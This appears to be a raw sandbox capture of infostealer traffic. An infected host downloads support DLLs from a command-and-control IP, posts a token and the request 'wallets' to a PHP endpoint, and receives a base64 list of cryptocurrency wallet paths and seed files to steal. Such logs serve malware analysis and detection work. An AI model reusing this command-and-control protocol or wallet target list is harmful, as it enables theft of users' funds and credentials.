Feb 21, 2024 00:23:04.951220989 CET	95	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.145 Cache-Control: no-cache
Feb 21, 2024 00:23:05.240878105 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:05 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Feb 21, 2024 00:23:05.897111893 CET	91	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.145 Cache-Control: no-cache
Feb 21, 2024 00:23:06.186403036 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:06 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Feb 21, 2024 00:23:08.729326963 CET	95	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.145 Cache-Control: no-cache
Feb 21, 2024 00:23:09.018667936 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:08 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Feb 21, 2024 00:23:09.696142912 CET	99	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.145 Cache-Control: no-cache
Feb 21, 2024 00:23:09.986012936 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:09 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Feb 21, 2024 00:23:10.778593063 CET	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF Host: 185.172.128.145 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:23:11.115339994 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:11.228874922 CET	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH Host: 185.172.128.145 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 2d 2d 0d 0a Data Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="message"wallets------DAFCAAEGDBKJJKECBKFH--
Feb 21, 2024 00:23:11.520294905 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2
